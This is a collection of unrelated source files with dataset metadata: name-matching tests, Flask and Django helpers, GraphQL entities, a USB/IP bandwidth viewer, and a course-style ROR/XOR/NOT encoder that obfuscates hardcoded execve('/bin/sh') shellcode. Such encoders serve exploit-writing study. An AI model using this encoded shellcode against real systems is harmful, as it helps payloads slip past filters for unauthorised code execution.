)
self.global_pooling = nn.AdaptiveAvgPool2d(1)
self.classifier = nn.Linear(C_prev, self.num_labels)
def forward(self, inputs):
feature = self.stem(inputs)
for cell in self.cells:
feature = cell(feature)
out = self.lastact(feature)
out = self.global_pooling(out)
out = out.view(out.size(0), -1)
logits = self.classifier(out)
return logits
| 34.786408 | 110 | 0.579542 | 6,161 | 0.859754 | 0 | 0 | 1,935 | 0.270025 | 0 | 0 | 458 | 0.063913 |
c7a0f4dd6f424ce5b114a5129ff1abc4021aa810 | 1,195 | py | Python | setup.py | Pasha13666/dialog_py | c54a0e06dc0a5f86d9791b8cbd6fcfacb5b644ff | [
"MIT"
]
| 1 | 2021-02-17T07:38:01.000Z | 2021-02-17T07:38:01.000Z | setup.py | Pasha13666/dialog_py | c54a0e06dc0a5f86d9791b8cbd6fcfacb5b644ff | [
"MIT"
]
| null | null | null | setup.py | Pasha13666/dialog_py | c54a0e06dc0a5f86d9791b8cbd6fcfacb5b644ff | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='dialog_py',
version='1.0a1',
description='Python API for cdialog/linux dialog',
long_description=long_description,
url='https://github.com/pasha13666/dialog_py',
author='Pasha__kun',
author_email='[email protected]',
packages=['dialog_py'],
install_requires=[],
include_package_data=True,
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython'
]
)
| 31.447368 | 88 | 0.620921 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 676 | 0.56569 |
c7a18f6b2dc263a28bbb7cb8d8990ce3618a2615 | 8,334 | py | Python | test/test_who.py | rliebz/whoswho | 0c411e418c240fcec6ea0a23d15bd003056c65d0 | [
"MIT"
]
| 28 | 2018-02-14T23:14:59.000Z | 2021-07-08T07:24:54.000Z | test/test_who.py | rliebz/whoswho | 0c411e418c240fcec6ea0a23d15bd003056c65d0 | [
"MIT"
]
| 1 | 2019-01-21T15:25:49.000Z | 2019-01-23T19:03:06.000Z | test/test_who.py | rliebz/whoswho | 0c411e418c240fcec6ea0a23d15bd003056c65d0 | [
"MIT"
]
| 2 | 2018-09-27T05:46:46.000Z | 2020-07-16T05:19:02.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import nose
from nose.tools import *
from whoswho import who, config
from nameparser.config.titles import TITLES as NAMEPARSER_TITLES
class TestMatch(unittest.TestCase):
def setUp(self):
self.name = 'Robert Evan Liebowitz'
def test_string(self):
# Only relevant for python 2.X
assert_true(who.match(self.name, str('Robert Liebowitz')))
def test_unicode(self):
name = self.name
assert_true(who.match(name, 'attaché Robert Evan Liebowitz'))
assert_true(who.match(name, 'Rōbért Èvān Lîęböwitz'))
assert_false(who.match(name, 'Rōbért Èvān Lęîböwitz'))
def test_name_and_initials(self):
assert_true(who.match(self.name, 'R. Evan Liebowitz'))
assert_true(who.match(self.name, 'Robert E. Liebowitz'))
assert_true(who.match(self.name, 'R. E. Liebowitz'))
def test_different_number_initials(self):
assert_true(who.match(self.name, 'Robert Liebowitz'))
assert_true(who.match(self.name, 'R. Liebowitz'))
assert_false(who.match(self.name, 'Robert E. E. Liebowitz'))
assert_false(who.match(self.name, 'R. E. E. Liebowitz'))
assert_true(who.match('R.E.E. Liebowitz', 'R. E. E. Liebowitz'))
def test_different_initials(self):
assert_false(who.match(self.name, 'E. R. Liebowitz'))
assert_false(who.match(self.name, 'E. Liebowitz'))
assert_false(who.match(self.name, 'R. V. Liebowitz'))
assert_false(who.match(self.name, 'O. E. Liebowitz'))
def test_short_names(self):
assert_true(who.match(self.name, 'Rob Liebowitz'))
# TODO: Should these be true?
assert_false(who.match(self.name, 'Bert Liebowitz'))
assert_false(who.match(self.name, 'Robbie Liebowitz'))
def test_suffixes(self):
name = 'Robert Liebowitz Jr'
assert_true(who.match(name, 'Robert Liebowitz'))
assert_true(who.match(name, 'Robert Liebowitz Jr'))
assert_true(who.match(name, 'Robert Liebowitz, PhD'))
assert_false(who.match(name, 'Robert Liebowitz, Sr'))
assert_false(who.match(name, 'Robert Liebowitz, Sr, PhD'))
assert_true(who.match(name, 'Robert Liebowitz, Jr, PhD'))
def test_equivalent_suffixes(self):
name = 'Robert Liebowitz Jr'
assert_true(who.match(name, 'Robert Liebowitz Jnr'))
assert_false(who.match(name, 'Robert Liebowitz Snr'))
def test_titles(self):
name = 'Mr. Robert Liebowitz'
assert_true(who.match(name, 'Robert Liebowitz'))
assert_true(who.match(name, 'Sir Robert Liebowitz'))
assert_true(who.match(name, 'Dr. Robert Liebowitz'))
assert_false(who.match(name, 'Mrs. Robert Liebowitz'))
def test_nickname(self):
name = 'Robert "Evan" Liebowitz'
assert_true(who.match(name, 'Evan Liebowitz'))
assert_true(who.match('Evan Liebowitz', name))
assert_false(who.match(name, 'Wrongbert Lieobwitz'))
assert_false(who.match(name, 'Robert Evan'))
assert_false(who.match(name, 'Evan Liebowitz',
options={'check_nickname': False}))
class TestRatio(unittest.TestCase):
def setUp(self):
self.name = 'Robert Evan Liebowitz'
def test_string(self):
# Only relevant for python 2.X
assert_equal(who.ratio(self.name, str('Robert Liebowitz')), 100)
def test_unicode(self):
name = self.name
assert_equal(who.ratio(name, 'attaché Robert Evan Liebowitz'), 100)
assert_equal(who.ratio(name, 'Rōbért Èvān Lîęböwitz'), 100)
assert_true(who.ratio(name, 'Rōbért Èvān Lęîböwitz') < 100)
def test_name_and_initials(self):
assert_equal(who.ratio(self.name, 'R. Evan Liebowitz'), 100)
assert_equal(who.ratio(self.name, 'Robert E. Liebowitz'), 100)
assert_equal(who.ratio(self.name, 'R. E. Liebowitz'), 100)
def test_different_number_initials(self):
assert_equal(who.ratio(self.name, 'Robert Liebowitz'), 100)
assert_equal(who.ratio(self.name, 'R. Liebowitz'), 100)
assert_true(who.ratio(self.name, 'Robert E. E. Liebowitz') < 100)
assert_true(who.ratio(self.name, 'R. E. E. Liebowitz') < 100)
assert_equal(who.ratio('R.E.E. Liebowitz', 'R. E. E. Liebowitz'), 100)
def test_different_initials(self):
assert_true(who.ratio(self.name, 'E. R. Liebowitz') < 100)
assert_true(who.ratio(self.name, 'E. Liebowitz') < 100)
assert_true(who.ratio(self.name, 'R. V. Liebowitz') < 100)
assert_true(who.ratio(self.name, 'O. E. Liebowitz') < 100)
assert_true(who.ratio(self.name, 'E. R. Liebowitz') <
who.ratio(self.name, 'E. E. Liebowitz'))
assert_true(who.ratio(self.name, 'E. R. Liebowitz') <
who.ratio(self.name, 'R. R. Liebowitz'))
assert_true(who.ratio(self.name, 'E. R. Liebowitz') <
who.ratio(self.name, 'E. Liebowitz'))
def test_short_names(self):
assert_true(who.ratio(self.name, 'Rob Liebowitz'))
assert_true(who.ratio(self.name, 'Bert Liebowitz') < 100)
assert_true(who.ratio(self.name, 'Robbie Liebowitz') < 100)
assert_true(who.ratio(self.name, 'xxxxx Liebowitz') <
who.ratio(self.name, 'Bobby Liebowitz'))
def test_suffixes(self):
name = 'Robert Liebowitz Jr'
assert_equal(who.ratio(name, 'Robert Liebowitz'), 100)
assert_equal(who.ratio(name, 'Robert Liebowitz Jr'), 100)
assert_equal(who.ratio(name, 'Robert Liebowitz, PhD'), 100)
assert_false(who.ratio(name, 'Robert Liebowitz, Sr'))
assert_false(who.ratio(name, 'Robert Liebowitz, Sr, PhD'))
assert_equal(who.ratio(name, 'Robert Liebowitz, Jr, PhD'), 100)
# Suffix doesn't change a match
assert_equal(who.ratio(name, 'Zachary Liebowitz, Jr'),
who.ratio(name, 'Zachary Liebowitz'))
def test_equivalent_suffixes(self):
name = 'Robert Liebowitz Jr'
assert_equal(who.ratio(name, 'Robert Liebowitz Jnr'), 100)
assert_false(who.ratio(name, 'Robert Liebowitz Snr'))
def test_titles(self):
name = 'Mr. Robert Liebowitz'
assert_equal(who.ratio(name, 'Robert Liebowitz'), 100)
assert_equal(who.ratio(name, 'Sir Robert Liebowitz'), 100)
assert_equal(who.ratio(name, 'Dr. Robert Liebowitz'), 100)
assert_false(who.ratio(name, 'Mrs. Robert Liebowitz'))
# Title doesn't change a match
assert_equal(who.ratio(name, 'Dr. Zachary Liebowitz'),
who.ratio(name, 'Zachary Liebowitz'))
def test_nickname(self):
name = 'Robert "Evan" Liebowitz'
assert_equal(who.ratio(name, 'Evan Liebowitz'), 100)
assert_equal(who.ratio('Evan Liebowitz', name), 100)
assert_true(who.ratio(name, 'Wrongbert Lieobwitz') < 100)
assert_true(who.ratio(name, 'Robert Evan') < 100)
assert_true(who.ratio(name, 'Evan Liebowitz',
options={'check_nickname': False}) < 100)
assert_true(who.ratio(name, 'xxxx Liebowitz') <
who.ratio(name, 'xvax Liebowitz'))
assert_equal(who.ratio(name, 'xxxx Liebowitz'),
who.ratio(name, 'xvax Liebowitz', 'strict'))
# TODO: Should we ensure that the metadata is up to date?
@nottest
class TestConfig(unittest.TestCase):
def test_titles_all_defined(self):
"""
Check if list of titles is up to date with nameparser
"""
all_titles = (
config.MALE_TITLES |
config.FEMALE_TITLES |
config.GENDERLESS_TITLES
)
assert_equal(all_titles, NAMEPARSER_TITLES)
def test_suffixes_all_defined(self):
"""
Check if list of suffixes is up to date with nameparser
"""
from nameparser.config.suffixes import SUFFIX_ACRONYMS, SUFFIX_NOT_ACRONYMS
all_suffixes = (
config.UNIQUE_SUFFIXES |
config.MISC_SUFFIXES
)
nameparser_suffixes = (
SUFFIX_ACRONYMS |
SUFFIX_NOT_ACRONYMS
)
assert_equal(all_suffixes, nameparser_suffixes)
if __name__ == '__main__':
nose.main()
| 40.852941 | 83 | 0.636069 | 8,025 | 0.959469 | 0 | 0 | 840 | 0.10043 | 0 | 0 | 2,429 | 0.290411 |
c7a1b4eccd5313fe3d7a77b6d5633a8332809125 | 2,012 | py | Python | endpoints/UserEndpoint.py | GardenersGalore/server | f7d7f8ae07b56fc3c4fbe46f0784329cd94ace2d | [
"MIT"
]
| null | null | null | endpoints/UserEndpoint.py | GardenersGalore/server | f7d7f8ae07b56fc3c4fbe46f0784329cd94ace2d | [
"MIT"
]
| 1 | 2021-06-02T00:35:43.000Z | 2021-06-02T00:35:43.000Z | endpoints/UserEndpoint.py | GardenersGalore/server | f7d7f8ae07b56fc3c4fbe46f0784329cd94ace2d | [
"MIT"
]
| null | null | null | import json
from flask import request
from flask_restful import Resource, abort, reqparse
from models.User import User
"""
POST Creates a new resource.
GET Retrieves a resource.
PUT Updates an existing resource.
DELETE Deletes a resource.
"""
class UserEndpoint(Resource):
def post(self):
j = request.get_json()
# need to ensure the required fields are in the json
if "name" not in j:
abort(422, message="name is not in json body")
else:
name = j["name"]
if "username" not in j:
abort(422, message="username not in json body")
else:
username = j["username"]
if "email" not in j:
abort(422, message="email not in json body")
else:
email = j["email"]
if "password" not in j:
abort(422, message="password not in json body")
else:
password = j["password"]
user_obj = User(
name=name,
username=username,
email=email,
password=password,
)
if "phone_number" in j:
user_obj.phone_number = j["phone_number"]
if "experience" in j:
user_obj.experience = j["experience"]
if "pictureURL" in j:
user_obj.pictureURL = j["pictureURL"]
d = user_obj.save()
return json.loads(d.to_json())
def put(self):
# TODO
pass
def delete(self):
# TODO
pass
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('username', required=True, type=str, help='The username of the User')
args = parser.parse_args()
try:
user = json.loads(User.objects.get(username=args['username']).to_json())
except Exception as e:
print(e)
abort(404, message="User doesnt exist: {} doesn't exist".format(args['username']))
return user
| 24.240964 | 97 | 0.548708 | 1,719 | 0.854374 | 0 | 0 | 0 | 0 | 0 | 0 | 570 | 0.2833 |
c7a2778b2130c187c84f5bc78fd439f687e7ad10 | 450 | py | Python | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
]
| null | null | null | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
]
| 19 | 2017-02-18T17:53:56.000Z | 2017-03-11T22:09:06.000Z | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
]
| null | null | null | from django.forms import forms
class Form(forms.Form):
def get_value(self, name):
self.is_valid() # making sure we tried to clean the data before accessing it
if self.is_bound and name in self.cleaned_data:
return self.cleaned_data[name]
field = self[name]
return field.value() or ""
def to_dict(self):
return {name: self.get_value(name) for name in self.fields}
| 23.684211 | 86 | 0.622222 | 412 | 0.915556 | 0 | 0 | 0 | 0 | 0 | 0 | 63 | 0.14 |
c7a2d818488a83ba3e02cfaea886aa5551f314ae | 1,172 | py | Python | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
]
| 15 | 2015-08-11T09:50:00.000Z | 2021-10-02T19:30:53.000Z | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
]
| null | null | null | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
]
| 9 | 2015-08-11T09:51:55.000Z | 2021-10-18T18:04:11.000Z | #!/usr/bin/python
# Title: ROR/XOR/NOT encoder
# File: rorxornotencode.py
# Author: Guillaume Kaddouch
# SLAE-681
import sys
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
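# e.g. ror(0b00000001, 1, 8) == 0b10000000 (rotate right within max_bits bits)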
shellcode = (
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
encoded = ""
encoded2 = ""
print "[*] Encoding shellcode..."
for x in bytearray(shellcode):
# ROR & XOR encoding
z = ror(x, 7, 8)^0xAA
# NOT encoding
y = ~z
if str('%02x' % (y & 0xff)).upper() == "00":
print ">>>>>>>>>> NULL detected in shellcode, aborting."
sys.exit()
if str('%02x' % (y & 0xff)).upper() == "0A":
print ">>>>>>>>>> \\xOA detected in shellcode."
if str('%02x' % (y & 0xff)).upper() == "0D":
print ">>>>>>>>>>> \\x0D detected in shellcode."
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' %(y & 0xff)
print "hex version : %s" % encoded
print "nasm version : %s" % encoded2
print "encoded shellcode : %s bytes" % str(len(encoded)/4)
| 23.44 | 102 | 0.562287 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 529 | 0.451365 |
c7a32b4c1d013fec417f68425b02fe13d88c171e | 9,292 | py | Python | authalligator_client/entities.py | closeio/authalligator-client | fe93c9d2333d2949e44c48a2dd0a9a266734e026 | [
"MIT"
]
| null | null | null | authalligator_client/entities.py | closeio/authalligator-client | fe93c9d2333d2949e44c48a2dd0a9a266734e026 | [
"MIT"
]
| null | null | null | authalligator_client/entities.py | closeio/authalligator-client | fe93c9d2333d2949e44c48a2dd0a9a266734e026 | [
"MIT"
]
| 1 | 2021-01-31T13:08:48.000Z | 2021-01-31T13:08:48.000Z | import datetime
from enum import Enum
from typing import Any, Callable, Dict, List, Optional, Type, TypeVar, Union, cast
import attr
import ciso8601
import structlog
from attr import converters
from . import enums
from .utils import as_json_dict, to_snake_case
logger = structlog.get_logger()
class Omitted(Enum):
"""Singleton written in a way mypy can parse.
See https://www.python.org/dev/peps/pep-0484/#support-for-singleton-types-in-unions
for more details.
"""
token = 0
OMITTED = Omitted.token
"""A singleton to differentiate between omitted vs explicit :obj:`None`."""
# helper type for entity_converter
U = TypeVar("U", bound="BaseAAEntity")
def entity_converter(
entity_cls, # type: Union[List[Type[U]], Type[U]]
):
# type: (...) -> Callable[[Union[Omitted, U, Dict]], Union[U, Omitted]]
"""
Convert a dictionary response into instances of the entity class.
Usage:
# disambiguates between type_a and type_b based on ``__typename``
converter = entity_converter([TypeA, TypeB])
my_instance = converter({'__typename': 'TypeB'})
XXX: mypy isn't expressive enough to annotate that the return type will be
one of the _specific_ arg types and not the most generic bound base. We'll
unfortunately have to ``# type: ignore`` on lines that call this.
Args:
entity_cls: the class (or classes) the value should be converted into.
If multiple classes are provided as options, ``__typename`` must be
included in the reponse to support disambiguation.
Returns:
A callable that will convert a dictionary to the right entity type. If
more than one entity type is possible, that dictionary must have a
``__typename`` field present, which must match the ``TYPENAME`` on a
provided entity. If none of the provided types match of if the fields
don't align with the provided entity, a ``TypeError`` is raised.
"""
entity_classes = [] # type: List[Type[U]]
if isinstance(entity_cls, (list, tuple)):
entity_classes = entity_cls
else:
entity_classes = [entity_cls]
def _entity_converter(val):
# type: (Union[Dict[str, Any], U, Omitted]) -> Union[U, Omitted]
        # check if it's explicitly been omitted (don't try to convert those)
if val is OMITTED:
return val
# check if it's already an entity
if any([isinstance(val, e_cls) for e_cls in entity_classes]):
return cast(U, val)
        # definitely a dict now, since the other cases were handled above
        # (the cast is only for type checking)
val = cast(Dict[str, Any], val)
# if there's more than one possibility for entity classes, pick the
# right one based on ``__typename``
if len(entity_classes) == 1:
# only one option, we don't need an explicit type
selected_cls = entity_classes[0] # type: Type[U]
else:
# a few different return types are expected
typename = val.pop("__typename", None)
if typename is None:
type_options = ", ".join([e.TYPENAME for e in entity_classes])
raise TypeError(
'No "__typename" present to disambiguate between possible '
"types: [{}]".format(type_options)
)
matching_typename = next(
(e for e in entity_classes if e.TYPENAME == typename), None
) # type: Optional[Type[U]]
if matching_typename is None:
raise TypeError('No entity found for type "{}"'.format(typename))
selected_cls = matching_typename
return selected_cls.from_api_response(val)
return _entity_converter
@attr.attrs(frozen=True)
class BaseAAEntity(object):
TYPENAME = "" # type: str
"""The name of the graphql type in the schema.
Used for disambiguation when there's more than one possible type being
returned.
"""
as_dict = as_json_dict
@classmethod
def from_api_response(cls, data):
# type: (Type[U], Dict[str, Any]) -> U
# If __typename is present, this asserts that it matches this class's
# expected typename
typename = data.pop("__typename", None)
if typename and typename != cls.TYPENAME:
raise TypeError(
(
"Given type \"{}\" doesn't match this entity's type: "
'"{}". Is {} the right entity for '
"this data?"
).format(typename, cls.TYPENAME, cls.__name__)
)
# convert top-level kwargs from camelCase to snake_case
kwargs = {to_snake_case(k): v for k, v in data.items()}
# mypy doesn't like that we're providing kwargs to a type whose init
# doesn't accept any kwargs (even though subclasses do have attributes)
return cls(**kwargs) # type: ignore
@attr.attrs(frozen=True)
class AccountError(BaseAAEntity):
TYPENAME = "AccountError"
code = attr.attrib(converter=enums.AccountErrorCode) # type: enums.AccountErrorCode
message = attr.attrib() # type: Optional[str]
retry_in = attr.attrib() # type: Optional[int]
@attr.attrs(frozen=True)
class Account(BaseAAEntity):
TYPENAME = "Account"
provider = attr.attrib(converter=enums.ProviderType) # type: enums.ProviderType
username = attr.attrib() # type: str
access_token = attr.attrib() # type: Optional[str]
access_token_expires_at = attr.attrib(
converter=converters.optional(ciso8601.parse_datetime),
) # type: Optional[datetime.datetime]
@attr.attrs(frozen=True)
class DeleteOperation(BaseAAEntity):
"""Base class for delete operation payloads.
These payloads don't actually have any field information in them. While
there's technically a "_" field in the schema, it's only a placeholder to
work around the language not supporting empty responses. It has no meaning
and will never have a meaningful value.
This class has no specific equivalent type, it's just a convenience type
for these entities.
"""
pass
@attr.attrs(frozen=True)
class DeleteOtherAccountKeysPayload(DeleteOperation):
TYPENAME = "DeleteOtherAccountKeysPayload"
@attr.attrs(frozen=True)
class DeleteAccountKeyPayload(DeleteOperation):
TYPENAME = "DeleteAccountKeyPayload"
@attr.attrs(frozen=True)
class DeleteAccountPayload(DeleteOperation):
TYPENAME = "DeleteAccountPayload"
@attr.attrs(frozen=True)
class AuthorizeAccountPayload(BaseAAEntity):
TYPENAME = "AuthorizeAccountPayload"
account = attr.attrib(
converter=entity_converter(Account), # type: ignore[misc]
) # type: Account
account_key = attr.attrib() # type: str
number_of_account_keys = attr.attrib() # type: int
@attr.attrs(frozen=True)
class VerifyAccountPayload(BaseAAEntity):
TYPENAME = "VerifyAccountPayload"
account = attr.attrib(
converter=entity_converter(Account), # type: ignore[misc]
) # type: Account
@attr.attrs(frozen=True)
class Query(BaseAAEntity):
account = attr.attrib(
default=OMITTED,
converter=entity_converter([Account, AccountError]), # type: ignore[misc]
) # type: Union[Omitted, Account, AccountError]
@attr.attrs(frozen=True)
class Mutation(BaseAAEntity):
    # mypy and the attrs plugin don't like the `Omitted` default + converter
# stuff
authorize_account = attr.attrib( # type: ignore
default=OMITTED,
        # ignore unsupported converter warning
converter=cast( # type: ignore[misc]
Union[Omitted, AuthorizeAccountPayload, AccountError],
entity_converter([AuthorizeAccountPayload, AccountError]),
),
) # type: Union[Omitted, AuthorizeAccountPayload, AccountError]
verify_account = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, VerifyAccountPayload, AccountError],
entity_converter([VerifyAccountPayload, AccountError]),
),
) # type: Union[Omitted, VerifyAccountPayload, AccountError]
delete_account = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteAccountPayload, AccountError],
entity_converter([DeleteAccountPayload, AccountError]),
),
) # type: Union[Omitted, DeleteAccountPayload, AccountError]
delete_account_key = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteAccountKeyPayload, AccountError],
entity_converter([DeleteAccountKeyPayload, AccountError]),
),
) # type: Union[Omitted, DeleteAccountKeyPayload, AccountError]
delete_other_account_keys = attr.attrib( # type: ignore
default=OMITTED,
        # ignore unsupported converter warning
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteOtherAccountKeysPayload, AccountError],
entity_converter([DeleteOtherAccountKeysPayload, AccountError]),
),
) # type: Union[Omitted, DeleteOtherAccountKeysPayload, AccountError]
| 35.19697 | 88 | 0.660461 | 5,400 | 0.581145 | 0 | 0 | 5,471 | 0.588786 | 0 | 0 | 4,293 | 0.46201 |
c7a3e79d5fcb0530f653c35813c95268647570c7 | 9,739 | py | Python | library/device.py | lompal/USBIPManager | b03d8d9c0befcd70b7f67cfe61c0664f48d2939d | [
"MIT"
]
| 24 | 2019-01-25T20:40:07.000Z | 2020-11-20T08:12:14.000Z | library/device.py | lompal/USBIPManager | b03d8d9c0befcd70b7f67cfe61c0664f48d2939d | [
"MIT"
]
| 3 | 2018-11-28T14:04:57.000Z | 2020-09-14T08:35:09.000Z | library/device.py | lompal/USBIPManager | b03d8d9c0befcd70b7f67cfe61c0664f48d2939d | [
"MIT"
]
| 6 | 2019-08-23T05:30:26.000Z | 2020-11-20T08:12:03.000Z | from library import config, ini, lang, log, performance, periphery, queue
from asyncio import get_event_loop
from threading import Thread, Event
from PyQt5.QtCore import QObject, pyqtSignal
from PyQt5.QtWidgets import QTreeWidgetItem
# noinspection PyPep8Naming
class Signal(QObject):
""" PyQt signals for correct daemon device tree calls from a different thread """
addTopLevelItem_ = pyqtSignal(object)
setText_ = pyqtSignal(str, int, str)
setToolTip_ = pyqtSignal(str, int, object)
setIcon_ = pyqtSignal(str, int, object)
def addTopLevelItem(self, daemon):
""" Load daemon as a top-level item - emit the signal """
self.addTopLevelItem_.emit(daemon)
def setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth - emit the signal """
self.setText_.emit(bid, col, baud)
def setToolTip(self, bid, col, html):
""" Set tooltip for a daemon during capturing operation - emit the signal """
self.setToolTip_.emit(bid, col, html)
def setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation - emit the signal """
self.setIcon_.emit(bid, col, icon)
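# Usage sketch: worker threads call the public Signal methods via Tree; the
# emitted signals are delivered by Qt on the GUI thread to the connected
# Tree._setText/_setToolTip/_setIcon slots, keeping widget updates thread-safe.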
# noinspection PyPep8Naming
class Tree(metaclass=config.Singleton):
""" Daemon device bandwidth tree """
def __init__(self, base, ip_addr):
self._base = base
self._ip_addr = ip_addr
self._sw_config = ini.SWConfig(self._base)
self._lang = lang.Tree
self._signal = Signal()
self._signal.addTopLevelItem_.connect(lambda __daemon: self._addTopLevelItem(__daemon))
self._signal.setText_.connect(lambda __bid, __col, __baud: self._setText(__bid, __col, __baud))
self._signal.setToolTip_.connect(lambda __bid, __col, __html: self._setToolTip(__bid, __col, __html))
self._signal.setIcon_.connect(lambda __bid, __col, __icon: self._setIcon(__bid, __col, __icon))
def _getDaemon(self):
""" """
_root = self._base.dev_tree.invisibleRootItem()
for idx in range(_root.childCount()):
_daemon = _root.child(idx)
if _daemon.text(0) == self._ip_addr:
return _daemon, idx
return None, None
def _takeDaemon(self, idx):
""" """
return self._base.dev_tree.takeTopLevelItem(idx)
def _loadDaemon(self):
""" """
_daemon = QTreeWidgetItem([self._ip_addr])
self.addTopLevelItem(_daemon)
return _daemon, 0
def _getDevice(self, bid):
""" """
_daemon, _idx = self._getDaemon()
if not _daemon:
return None, None
for idx in range(_daemon.childCount()):
_dev = _daemon.child(idx)
if _dev.text(0) == bid:
return _daemon, _dev
return _daemon, None
def _addTopLevelItem(self, daemon):
""" Load daemon as a top-level item - inner function """
self._base.dev_tree.addTopLevelItem(daemon)
self._base.dev_tree.expandAll()
def _setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_baud = _dev.child(0)
_baud.setText(col, baud)
def _setToolTip(self, bid, col, html):
""" Set tooltip for a daemon during capturing operation - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_dev.setToolTip(col, html)
def _setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_dev.setIcon(col, icon)
def addTopLevelItem(self, daemon):
""" Load daemon as a top-level item from a different thread """
self._signal.addTopLevelItem(daemon)
def setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth from a different thread """
self._signal.setText(bid, col, baud)
def setToolTip(self, bid, col, html):
""" Set status tooltip for a daemon during capturing operation from a different thread """
self._signal.setToolTip(bid, col, html)
def setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation from a different thread """
self._signal.setIcon(bid, col, icon)
def loadDevice(self, bid):
""" """
_device = QTreeWidgetItem([bid])
_daemon, _idx = self._getDaemon()
if not _daemon:
_daemon, _idx = self._loadDaemon()
_daemon, _dev = self._getDevice(bid)
if _dev:
return
_daemon = self._takeDaemon(_idx)
if self._sw_config.dev_perf:
_baud = QTreeWidgetItem([self._lang.ParamBaud, self._lang.ParamNA, self._lang.ParamNA])
_device.addChild(_baud)
_daemon.addChild(_device)
self.addTopLevelItem(_daemon)
def unloadDevice(self, bid):
""" """
_daemon, _dev = self._getDevice(bid)
if _dev:
_daemon.removeChild(_dev)
def setIncoming(self, bid, baud):
""" Set incoming bandwidth """
self.setText(bid, 1, baud)
def setOutgoing(self, bid, baud):
""" Set outgoing bandwidth """
self.setText(bid, 2, baud)
# noinspection PyPep8Naming
class USBTop(metaclass=config.Singleton):
""" Daemon device bandwidth processing """
def __init__(self, base, ip_addr):
self._base = base
self._ip_addr = ip_addr
self._loop = get_event_loop()
self._sw_config = ini.SWConfig(self._base)
self._manager = queue.Manager(self._base)
self._name_running = f'USBTOP processing running : {self._ip_addr}'
self._name_cancelling = f'USBTOP processing cancelling : {self._ip_addr}'
self._ssh = periphery.SSH(self._base, self._ip_addr)
self._log = log.Manager(self._base)
self._lang = lang.USBTop
self._tree = Tree(self._base, self._ip_addr)
self._dmn_perf = performance.Device(self._base)
self._thread = Thread()
self._event = Event()
self._pid = None
# noinspection PyMethodMayBeStatic
def _idx(self, row):
""" """
return [param for param in row.split() if param.isdigit()].pop()
def _processing(self, buf):
""" """
_bid = None
for row in buf:
if 'Bus ID' in row:
_bid = self._idx(row)
continue
if 'Device ID' in row:
_did = self._idx(row)
_value = row.split()
self._dmn_perf.setProcessing(self._ip_addr, _bid, _did, (_value[4], _value[6]))
def _exec(self):
""" Run the USBTOP processing - daemon thread """
_query = 'sudo usbtop'
_echo = self._ssh.exec(_query)
if not all(_echo):
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.RunQuery} : {_query}')
self._pid, _stdin, _stdout, _stderr = _echo
_buf = list()
while not self._event.is_set():
_line = _stdout.readline(2048)
if not _line:
return self._event.set()
if '\x1b[2J\x1b[1;1H' in _line:
self._processing(_buf)
_buf = list()
_buf.append(_line.strip().replace('\x1b[2J\x1b[1;1H', ''))
continue
_buf.append(_line.strip())
def __run(self):
""" Run the USBTOP processing - inner function """
self._event = Event()
self._thread = Thread(target=self._exec, name=self._name_running)
self._thread.start()
self._log.setSuccess(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.RunSuccess}')
self._event.wait()
return self._event.is_set()
async def _run(self):
""" Run the USBTOP processing - coroutine """
if not self._sw_config.dev_perf:
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.EnableRequired}')
if self.isRunning():
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.AforeRun}')
if not await self._ssh.establish(self._lang.LogSeparator):
return self._log.setInformation(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelSuccess}')
await self._loop.run_in_executor(None, self.__run)
if self.isRunning():
self.cancel()
